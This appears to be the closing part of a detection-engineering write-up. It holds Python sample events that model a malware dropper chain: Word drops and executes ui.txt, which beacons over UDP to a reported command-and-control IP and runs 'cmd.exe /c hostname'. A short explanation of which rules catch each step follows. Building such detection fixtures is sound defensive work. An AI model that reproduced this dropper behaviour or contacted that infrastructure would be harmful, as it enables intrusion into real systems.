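# Constructed event stream: the dropper chain (ids 1-5) plus two benign events.
SAMPLE_EVENTS = [
    {"id": 1, "type": "ProcessCreate", "image": WINWORD, "parent": EXPLORER,
     "cmdline": "WINWORD.EXE /n seminer.doc"},
    {"id": 2, "type": "FileCreate", "image": WINWORD, "target": r"C:\Users\Public\ui.txt"},
    {"id": 3, "type": "ProcessCreate", "image": r"C:\Users\Public\ui.txt", "parent": WINWORD,
     "cmdline": r"C:\Users\Public\ui.txt"},
    {"id": 4, "type": "NetworkConnect", "image": r"C:\Users\Public\ui.txt", "protocol": "udp",
     "dst_ip": "157.20.182.75", "dst_port": 1269},
    {"id": 5, "type": "ProcessCreate", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Users\Public\ui.txt", "cmdline": "cmd.exe /c hostname"},
    {"id": 6, "type": "ProcessCreate", "image": r"C:\Windows\System32\cmd.exe", "parent": EXPLORER,
     "cmdline": "cmd.exe"},
    {"id": 7, "type": "NetworkConnect", "image": r"C:\Program Files\Browser\browser.exe",
     "protocol": "tcp", "dst_ip": "203.0.113.5", "dst_port": 443},
]

if __name__ == "__main__":
    for rule, event_id in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The first three rules fire before any network activity, so they catch the chain even if the C2 address changes; the UDP rule is the narrow, high-confidence match on the infrastructure reported here.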
